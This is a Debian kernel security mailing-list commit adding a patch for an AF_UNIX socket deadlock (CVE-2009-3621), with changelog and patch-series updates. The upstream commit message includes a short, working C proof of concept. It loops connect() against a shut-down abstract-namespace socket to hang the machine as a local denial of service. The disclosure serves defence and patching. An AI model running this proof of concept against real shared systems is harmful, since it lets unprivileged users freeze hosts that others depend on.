[kernel] r14475 - in dists/lenny-security/linux-2.6/debian: . patches/bugfix/all patches/series
Dann Frazier
dannf at alioth.debian.org
Wed Oct 28 04:25:04 UTC 2009
Author: dannf
Date: Wed Oct 28 04:25:02 2009
New Revision: 14475
Log:
AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
Added:
dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
Modified:
dists/lenny-security/linux-2.6/debian/changelog
dists/lenny-security/linux-2.6/debian/patches/series/19lenny2
Modified: dists/lenny-security/linux-2.6/debian/changelog
==============================================================================
--- dists/lenny-security/linux-2.6/debian/changelog Wed Oct 28 04:23:09 2009 (r14474)
+++ dists/lenny-security/linux-2.6/debian/changelog Wed Oct 28 04:25:02 2009 (r14475)
@@ -5,6 +5,7 @@
* netlink: fix typo in initialization (CVE-2009-3612)
* drm/r128: Add test for initialisation to all ioctls that require it
(CVE-2009-3620)
+ * AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
-- dann frazier <dannf at debian.org> Tue, 27 Oct 2009 21:33:02 -0600
Added: dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
==============================================================================
--- /dev/null 00:00:00 1970 (empty, because file is newly added)
+++ dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch Wed Oct 28 04:25:02 2009 (r14475)
@@ -0,0 +1,83 @@
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675
+Author: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+Date: Sun Oct 18 23:17:37 2009 -0700
+
+ AF_UNIX: Fix deadlock on connecting to shutdown socket
+
+ I found a deadlock bug in UNIX domain socket, which makes able to DoS
+ attack against the local machine by non-root users.
+
+ How to reproduce:
+ 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
+ namespace(*), and shutdown(2) it.
+ 2. Repeat connect(2)ing to the listening socket from the other sockets
+ until the connection backlog is full-filled.
+ 3. connect(2) takes the CPU forever. If every core is taken, the
+ system hangs.
+
+ PoC code: (Run as many times as cores on SMP machines.)
+
+ int main(void)
+ {
+ int ret;
+ int csd;
+ int lsd;
+ struct sockaddr_un sun;
+
+ /* make an abstruct name address (*) */
+ memset(&sun, 0, sizeof(sun));
+ sun.sun_family = PF_UNIX;
+ sprintf(&sun.sun_path[1], "%d", getpid());
+
+ /* create the listening socket and shutdown */
+ lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+ bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+ listen(lsd, 1);
+ shutdown(lsd, SHUT_RDWR);
+
+ /* connect loop */
+ alarm(15); /* forcely exit the loop after 15 sec */
+ for (;;) {
+ csd = socket(AF_UNIX, SOCK_STREAM, 0);
+ ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+ if (-1 == ret) {
+ perror("connect()");
+ break;
+ }
+ puts("Connection OK");
+ }
+ return 0;
+ }
+
+ (*) Make sun_path[0] = 0 to use the abstruct namespace.
+ If a file-based socket is used, the system doesn't deadlock because
+ of context switches in the file system layer.
+
+ Why this happens:
+ Error checks between unix_socket_connect() and unix_wait_for_peer() are
+ inconsistent. The former calls the latter to wait until the backlog is
+ processed. Despite the latter returns without doing anything when the
+ socket is shutdown, the former doesn't check the shutdown state and
+ just retries calling the latter forever.
+
+ Patch:
+ The patch below adds shutdown check into unix_socket_connect(), so
+ connect(2) to the shutdown socket will return -ECONREFUSED.
+
+ Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+ Signed-off-by: Masanori Yoshida <masanori.yoshida.tv at hitachi.com>
+ Signed-off-by: David S. Miller <davem at davemloft.net>
+
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 51ab497..fc820cd 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1074,6 +1074,8 @@ restart:
+ err = -ECONNREFUSED;
+ if (other->sk_state != TCP_LISTEN)
+ goto out_unlock;
++ if (other->sk_shutdown & RCV_SHUTDOWN)
++ goto out_unlock;
+
+ if (unix_recvq_full(other)) {
+ err = -EAGAIN;
Modified: dists/lenny-security/linux-2.6/debian/patches/series/19lenny2
==============================================================================
--- dists/lenny-security/linux-2.6/debian/patches/series/19lenny2 Wed Oct 28 04:23:09 2009 (r14474)
+++ dists/lenny-security/linux-2.6/debian/patches/series/19lenny2 Wed Oct 28 04:25:02 2009 (r14475)
@@ -2,3 +2,4 @@
+ bugfix/all/random-make-get_random_int-more-random.patch
+ bugfix/all/netlink-fix-typo-in-initialization.patch
+ bugfix/all/drm+r128-Add-test-for-init-to-all-reqd-ioctls.patch
++ bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
More information about the Kernel-svn-changes
mailing list